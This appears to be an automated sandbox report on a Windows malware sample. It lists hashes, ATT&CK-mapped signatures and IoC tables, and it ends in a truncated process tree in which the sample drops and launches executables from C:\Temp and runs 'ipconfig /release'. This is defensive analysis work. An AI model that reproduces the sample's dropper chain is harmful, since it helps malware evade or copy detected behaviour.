c0f4fb8eb62234d4b2255d87e647295c6dd905d4cfd01df5a3b278903fc49c4f

Analysis

max time kernel
149s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05/10/2024, 01:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
Size

361KB
MD5

15ae8f17b13074ebd092129e5c23ddc7
SHA1

7ebce4f6781329628c6eb8322f28bf99982e6a39
SHA256

c0f4fb8eb62234d4b2255d87e647295c6dd905d4cfd01df5a3b278903fc49c4f
SHA512

ac8b4cbbd795481e32896c1ee380cedbaced134455158f6470ed403dca14a07365cfc8fe6cb9cc6d4bedc9108af8c4a39c98594522c318067a109df6ce92f4ea
SSDEEP

6144:kflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:kflfAsiVGjSGecvX

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
4740	dxvpnifaysqkicav.exe
5112	CreateProcess.exe
2924	lfdpnhfays.exe
1348	CreateProcess.exe
3384	CreateProcess.exe
2512	i_lfdpnhfays.exe
540	CreateProcess.exe
4084	pkicausnkf.exe
3736	CreateProcess.exe
2288	CreateProcess.exe
4828	i_pkicausnkf.exe
2232	CreateProcess.exe
396	hfzxspkhca.exe
4040	CreateProcess.exe
4904	CreateProcess.exe
4544	i_hfzxspkhca.exe
2620	CreateProcess.exe
4492	fzxrpjhczu.exe
2280	CreateProcess.exe
4792	CreateProcess.exe
332	i_fzxrpjhczu.exe
4716	CreateProcess.exe
2852	ecwmgeywro.exe
3796	CreateProcess.exe
4908	CreateProcess.exe
4016	i_ecwmgeywro.exe
116	CreateProcess.exe
4960	ztrljebwuo.exe
1628	CreateProcess.exe
5016	CreateProcess.exe
1996	i_ztrljebwuo.exe
3956	CreateProcess.exe
4728	qoigaytqlj.exe
3792	CreateProcess.exe
3884	CreateProcess.exe
4220	i_qoigaytqlj.exe
4828	CreateProcess.exe
4320	lfdyvqoiga.exe
4592	CreateProcess.exe
1500	CreateProcess.exe
1728	i_lfdyvqoiga.exe
4956	CreateProcess.exe
3420	nigaysicav.exe
3460	CreateProcess.exe
860	CreateProcess.exe
1288	i_nigaysicav.exe
4416	CreateProcess.exe
1964	ifaysqkica.exe
1960	CreateProcess.exe
3340	CreateProcess.exe
3000	i_ifaysqkica.exe
820	CreateProcess.exe
1228	fcxupnhfzx.exe
1136	CreateProcess.exe
424	CreateProcess.exe
4212	i_fcxupnhfzx.exe
4016	CreateProcess.exe
4908	fzxrpkhcau.exe
1816	CreateProcess.exe
4228	CreateProcess.exe
4732	i_fzxrpkhcau.exe
3384	CreateProcess.exe
2392	kecwuomhez.exe
3980	CreateProcess.exe

System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pkicausnkf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_hfzxspkhca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ztrljebwuo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nigaysicav.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxvqnigays.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_fcxupnhfzx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_fzxrpkhcau.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ausnkfcxvp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_ausnkfcxvp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxvpnifaysqkicav.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CreateProcess.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_lfdpnhfays.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_pkicausnkf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dbvtnlfdyv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_lfdyvqoiga.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fzxrpkhcau.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gezwrpjhbz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_dbvtnlfdyv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fzxrpjhczu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lfdyvqoiga.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ifaysqkica.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_ifaysqkica.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kecwuomhez.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_fzxrpjhczu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ecwmgeywro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_eywqoigbyt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yvqoigaytq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_dxvqnigays.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eywqoigbyt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lfdpnhfays.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hfzxspkhca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_ztrljebwuo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_qoigaytqlj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_nigaysicav.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_kecwuomhez.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_gezwrpjhbz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_yvqoigaytq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xrpkhcausm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_ecwmgeywro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qoigaytqlj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fcxupnhfzx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_xrpkhcausm.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5112	ipconfig.exe
1524	ipconfig.exe
4488	ipconfig.exe
4792	ipconfig.exe
4932	ipconfig.exe
4560	ipconfig.exe
3312	ipconfig.exe
4332	ipconfig.exe
508	ipconfig.exe
4568	ipconfig.exe
316	ipconfig.exe
2680	ipconfig.exe
4084	ipconfig.exe
332	ipconfig.exe
3812	ipconfig.exe
2556	ipconfig.exe
540	ipconfig.exe
3996	ipconfig.exe
1708	ipconfig.exe
1420	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31135432"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ea125702b7698d479b1c3c8e0190d45f00000000020000000000106600000001000020000000612c121f91798b38d2ba9b01f00f93505c1c8d84e83327b4de4445a303f848b5000000000e8000000002000020000000bf5f05864fb61c186a12fbed7fb4b34f9c56a2cf02c819e0c5ffc9c8919bb733200000002160b1c7895cc16f06eb56ca51e274a8e7811df72f160bde0cadf8e70539ce62400000004ac717e0edee41b80e9d49ef1d3bfe7698a9729166f8042ed6691ed14dff263e2ca6fa9a231efccced6a2845cc258df3f59398199f131eefc8cc30bc93943b32	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "650133007"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "653727200"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30bb7727c816db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "650133007"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20e77e27c816db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ea125702b7698d479b1c3c8e0190d45f0000000002000000000010660000000100002000000010bc093458505231cc69ebb62619589df687dd8a52fcf632f2acc71dc81a8edb000000000e80000000020000200000006e55d3221bf3e8e3b0c2d6c4d5016aaf19653eedab06a3297ef6da460263d72920000000b3613a0628d6eeedfa1232e3378542ca6447bcba172696a994a62d329650ab2c40000000997cd4f38fb31def9195d7d654a8e90ab5579c99f8410f0773c7079eebadb25f7660688020cfbf63a254ee41fd3ebff143811b5ab51493bf3f5f9a450b156e87	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434857628"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{525B78B6-82BB-11EF-AC6B-562BAB028465} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31135432"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31135432"	IEXPLORE.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
4740	dxvpnifaysqkicav.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe

Suspicious behavior: LoadsDriver 20 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2512	i_lfdpnhfays.exe
Token: SeDebugPrivilege	4828	i_pkicausnkf.exe
Token: SeDebugPrivilege	4544	i_hfzxspkhca.exe
Token: SeDebugPrivilege	332	i_fzxrpjhczu.exe
Token: SeDebugPrivilege	4016	i_ecwmgeywro.exe
Token: SeDebugPrivilege	1996	i_ztrljebwuo.exe
Token: SeDebugPrivilege	4220	i_qoigaytqlj.exe
Token: SeDebugPrivilege	1728	i_lfdyvqoiga.exe
Token: SeDebugPrivilege	1288	i_nigaysicav.exe
Token: SeDebugPrivilege	3000	i_ifaysqkica.exe
Token: SeDebugPrivilege	4212	i_fcxupnhfzx.exe
Token: SeDebugPrivilege	4732	i_fzxrpkhcau.exe
Token: SeDebugPrivilege	1920	i_kecwuomhez.exe
Token: SeDebugPrivilege	4400	i_gezwrpjhbz.exe
Token: SeDebugPrivilege	1768	i_eywqoigbyt.exe
Token: SeDebugPrivilege	2620	i_yvqoigaytq.exe
Token: SeDebugPrivilege	1808	i_dbvtnlfdyv.exe
Token: SeDebugPrivilege	4272	i_dxvqnigays.exe
Token: SeDebugPrivilege	2348	i_ausnkfcxvp.exe
Token: SeDebugPrivilege	5112	i_xrpkhcausm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
624	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
624	iexplore.exe
624	iexplore.exe
3896	IEXPLORE.EXE
3896	IEXPLORE.EXE
3896	IEXPLORE.EXE
3896	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1944 wrote to memory of 4740	1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe	82
PID 1944 wrote to memory of 4740	1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe	82
PID 1944 wrote to memory of 4740	1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe	82
PID 1944 wrote to memory of 624	1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe	83
PID 1944 wrote to memory of 624	1944	15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe	83
PID 624 wrote to memory of 3896	624	iexplore.exe	84
PID 624 wrote to memory of 3896	624	iexplore.exe	84
PID 624 wrote to memory of 3896	624	iexplore.exe	84
PID 4740 wrote to memory of 5112	4740	dxvpnifaysqkicav.exe	85
PID 4740 wrote to memory of 5112	4740	dxvpnifaysqkicav.exe	85
PID 4740 wrote to memory of 5112	4740	dxvpnifaysqkicav.exe	85
PID 2924 wrote to memory of 1348	2924	lfdpnhfays.exe	88
PID 2924 wrote to memory of 1348	2924	lfdpnhfays.exe	88
PID 2924 wrote to memory of 1348	2924	lfdpnhfays.exe	88
PID 4740 wrote to memory of 3384	4740	dxvpnifaysqkicav.exe	95
PID 4740 wrote to memory of 3384	4740	dxvpnifaysqkicav.exe	95
PID 4740 wrote to memory of 3384	4740	dxvpnifaysqkicav.exe	95
PID 4740 wrote to memory of 540	4740	dxvpnifaysqkicav.exe	98
PID 4740 wrote to memory of 540	4740	dxvpnifaysqkicav.exe	98
PID 4740 wrote to memory of 540	4740	dxvpnifaysqkicav.exe	98
PID 4084 wrote to memory of 3736	4084	pkicausnkf.exe	101
PID 4084 wrote to memory of 3736	4084	pkicausnkf.exe	101
PID 4084 wrote to memory of 3736	4084	pkicausnkf.exe	101
PID 4740 wrote to memory of 2288	4740	dxvpnifaysqkicav.exe	105
PID 4740 wrote to memory of 2288	4740	dxvpnifaysqkicav.exe	105
PID 4740 wrote to memory of 2288	4740	dxvpnifaysqkicav.exe	105
PID 4740 wrote to memory of 2232	4740	dxvpnifaysqkicav.exe	107
PID 4740 wrote to memory of 2232	4740	dxvpnifaysqkicav.exe	107
PID 4740 wrote to memory of 2232	4740	dxvpnifaysqkicav.exe	107
PID 396 wrote to memory of 4040	396	hfzxspkhca.exe	109
PID 396 wrote to memory of 4040	396	hfzxspkhca.exe	109
PID 396 wrote to memory of 4040	396	hfzxspkhca.exe	109
PID 4740 wrote to memory of 4904	4740	dxvpnifaysqkicav.exe	112
PID 4740 wrote to memory of 4904	4740	dxvpnifaysqkicav.exe	112
PID 4740 wrote to memory of 4904	4740	dxvpnifaysqkicav.exe	112
PID 4740 wrote to memory of 2620	4740	dxvpnifaysqkicav.exe	114
PID 4740 wrote to memory of 2620	4740	dxvpnifaysqkicav.exe	114
PID 4740 wrote to memory of 2620	4740	dxvpnifaysqkicav.exe	114
PID 4492 wrote to memory of 2280	4492	fzxrpjhczu.exe	116
PID 4492 wrote to memory of 2280	4492	fzxrpjhczu.exe	116
PID 4492 wrote to memory of 2280	4492	fzxrpjhczu.exe	116
PID 4740 wrote to memory of 4792	4740	dxvpnifaysqkicav.exe	120
PID 4740 wrote to memory of 4792	4740	dxvpnifaysqkicav.exe	120
PID 4740 wrote to memory of 4792	4740	dxvpnifaysqkicav.exe	120
PID 4740 wrote to memory of 4716	4740	dxvpnifaysqkicav.exe	123
PID 4740 wrote to memory of 4716	4740	dxvpnifaysqkicav.exe	123
PID 4740 wrote to memory of 4716	4740	dxvpnifaysqkicav.exe	123
PID 2852 wrote to memory of 3796	2852	ecwmgeywro.exe	125
PID 2852 wrote to memory of 3796	2852	ecwmgeywro.exe	125
PID 2852 wrote to memory of 3796	2852	ecwmgeywro.exe	125
PID 4740 wrote to memory of 4908	4740	dxvpnifaysqkicav.exe	128
PID 4740 wrote to memory of 4908	4740	dxvpnifaysqkicav.exe	128
PID 4740 wrote to memory of 4908	4740	dxvpnifaysqkicav.exe	128
PID 4740 wrote to memory of 116	4740	dxvpnifaysqkicav.exe	130
PID 4740 wrote to memory of 116	4740	dxvpnifaysqkicav.exe	130
PID 4740 wrote to memory of 116	4740	dxvpnifaysqkicav.exe	130
PID 4960 wrote to memory of 1628	4960	ztrljebwuo.exe	132
PID 4960 wrote to memory of 1628	4960	ztrljebwuo.exe	132
PID 4960 wrote to memory of 1628	4960	ztrljebwuo.exe	132
PID 4740 wrote to memory of 5016	4740	dxvpnifaysqkicav.exe	135
PID 4740 wrote to memory of 5016	4740	dxvpnifaysqkicav.exe	135
PID 4740 wrote to memory of 5016	4740	dxvpnifaysqkicav.exe	135
PID 4740 wrote to memory of 3956	4740	dxvpnifaysqkicav.exe	137
PID 4740 wrote to memory of 3956	4740	dxvpnifaysqkicav.exe	137

C:\Users\Admin\AppData\Local\Temp\15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\15ae8f17b13074ebd092129e5c23ddc7_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1944
- C:\Temp\dxvpnifaysqkicav.exe
  C:\Temp\dxvpnifaysqkicav.exe run
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4740
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\lfdpnhfays.exe ups_run
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5112
  - - C:\Temp\lfdpnhfays.exe
      C:\Temp\lfdpnhfays.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2924
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1348
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2680
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_lfdpnhfays.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:3384
  - - C:\Temp\i_lfdpnhfays.exe
      C:\Temp\i_lfdpnhfays.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2512
- - C:\temp\CreateProcess.exe
